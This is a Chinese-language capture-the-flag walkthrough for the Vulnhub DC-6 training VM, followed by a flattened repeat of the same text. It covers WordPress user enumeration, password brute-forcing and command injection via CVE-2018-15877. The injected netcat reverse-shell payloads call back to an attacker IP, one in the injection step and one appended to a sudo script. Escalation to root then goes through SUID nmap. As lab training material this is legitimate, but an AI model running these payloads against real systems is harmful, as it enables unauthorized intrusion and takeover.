Vulnhub靶机DC系列-DC6
字数 1072 2025-08-15 21:33:22

DC-6 靶机渗透教学文档

靶场介绍

  • 名称: DC-6
  • 来源: Vulnhub (https://www.vulnhub.com/entry/dc-6,315/)
  • 难度: 中等偏易,适合初学者
  • 目标: 获取root权限并读取flag
  • 技能要求: Linux命令行基础、基本渗透测试工具使用
  • 环境: VMware虚拟机桥接模式

环境准备

  1. 下载并导入DC-6虚拟机
  2. 设置网络为桥接模式
  3. 发现靶机IP后,修改本地hosts文件: 
    192.168.3.34 wordy
    (IP地址根据实际情况调整)

信息收集

1. 发现靶机IP

使用nmap扫描本地网络:

nmap -sn 192.168.3.0/24

2. 端口扫描与服务识别

nmap -sV -p- 192.168.3.34

3. Web服务枚举

  • 访问http://wordy (确保hosts已配置)
  • 使用dirb扫描目录: 
    dirb http://wordy
  • 识别为WordPress站点

WordPress渗透

1. 用户枚举

使用wpscan枚举用户:

wpscan --url http://wordy --enumerate u

2. 密码爆破

根据页面提示构建密码字典:

cat /usr/share/wordlists/rockyou.txt | grep k01 > password.txt

使用wpscan爆破:

wpscan --url http://wordy --usernames mark --passwords password.txt

发现凭证:mark/helpdesk01

后台利用

  1. 使用mark/helpdesk01登录WordPress后台
  2. 检查插件漏洞(CVE-2018-15877)
  3. 通过命令注入获取反弹shell:
    • 前端有长度限制,使用Burp Suite拦截修改请求
    • 注入payload:|nc -e /bin/bash <kali_ip> 4444
    • 或:||nc -e /bin/bash <kali_ip> 4444

权限提升

1. 初始shell处理

python -c 'import pty; pty.spawn("/bin/bash")'

2. 枚举系统用户

cat /etc/passwd | grep /bin/bash

3. 查找数据库凭证

检查WordPress配置文件:

cat /var/www/html/wordpress/wp-config.php

4. 横向移动

在mark目录下发现提示:

cat /home/mark/stuff/things-to-do.txt

发现凭证:graham/GSo7isUM1D4

切换到graham用户:

su graham

5. 利用sudo权限

检查graham的sudo权限:

sudo -l

发现可以以jens身份无密码执行/home/jens/backups.sh

6. 获取jens权限

  1. 修改backups.sh添加反弹shell命令: 
    echo "nc -e /bin/bash <kali_ip> 5555" >> /home/jens/backups.sh
  2. 执行脚本: 
    sudo -u jens /home/jens/backups.sh
  3. Kali监听5555端口获取jens的shell

7. 最终提权到root

  1. 检查SUID程序:

    find / -perm -4000 2>/dev/null

    发现nmap具有SUID权限

  2. 利用nmap的交互模式提权:

    nmap --interactive
> !sh

    或使用nmap脚本:

    echo 'os.execute("/bin/bash")' > /tmp/root.nse
nmap --script=/tmp/root.nse

获取flag

提权到root后,在/root目录下查找flag文件:

cd /root
ls
cat *.txt

总结

  1. WordPress用户枚举与密码爆破
  2. 插件漏洞利用获取初始访问
  3. 凭证发现与横向移动
  4. sudo权限滥用
  5. SUID提权最终获取root权限

关键点:密码字典构建、命令注入绕过、sudo权限利用、nmap提权技术

DC-6 靶机渗透教学文档 靶场介绍 名称 : DC-6 来源 : Vulnhub (https://www.vulnhub.com/entry/dc-6,315/) 难度 : 中等偏易,适合初学者 目标 : 获取root权限并读取flag 技能要求 : Linux命令行基础、基本渗透测试工具使用 环境 : VMware虚拟机桥接模式 环境准备 下载并导入DC-6虚拟机 设置网络为桥接模式 发现靶机IP后,修改本地hosts文件: (IP地址根据实际情况调整) 信息收集 1. 发现靶机IP 使用nmap扫描本地网络: 2. 端口扫描与服务识别 3. Web服务枚举 访问http://wordy (确保hosts已配置) 使用dirb扫描目录: 识别为WordPress站点 WordPress渗透 1. 用户枚举 使用wpscan枚举用户: 2. 密码爆破 根据页面提示构建密码字典: 使用wpscan爆破: 发现凭证: mark/helpdesk01 后台利用 使用mark/helpdesk01登录WordPress后台 检查插件漏洞(CVE-2018-15877) 通过命令注入获取反弹shell: 前端有长度限制,使用Burp Suite拦截修改请求 注入payload: |nc -e /bin/bash <kali_ip> 4444 或: ||nc -e /bin/bash <kali_ip> 4444 权限提升 1. 初始shell处理 2. 枚举系统用户 3. 查找数据库凭证 检查WordPress配置文件: 4. 横向移动 在mark目录下发现提示: 发现凭证: graham/GSo7isUM1D4 切换到graham用户: 5. 利用sudo权限 检查graham的sudo权限: 发现可以以jens身份无密码执行 /home/jens/backups.sh 6. 获取jens权限 修改backups.sh添加反弹shell命令: 执行脚本: Kali监听5555端口获取jens的shell 7. 最终提权到root 检查SUID程序: 发现nmap具有SUID权限 利用nmap的交互模式提权: 或使用nmap脚本: 获取flag 提权到root后,在/root目录下查找flag文件: 总结 WordPress用户枚举与密码爆破 插件漏洞利用获取初始访问 凭证发现与横向移动 sudo权限滥用 SUID提权最终获取root权限 关键点 :密码字典构建、命令注入绕过、sudo权限利用、nmap提权技术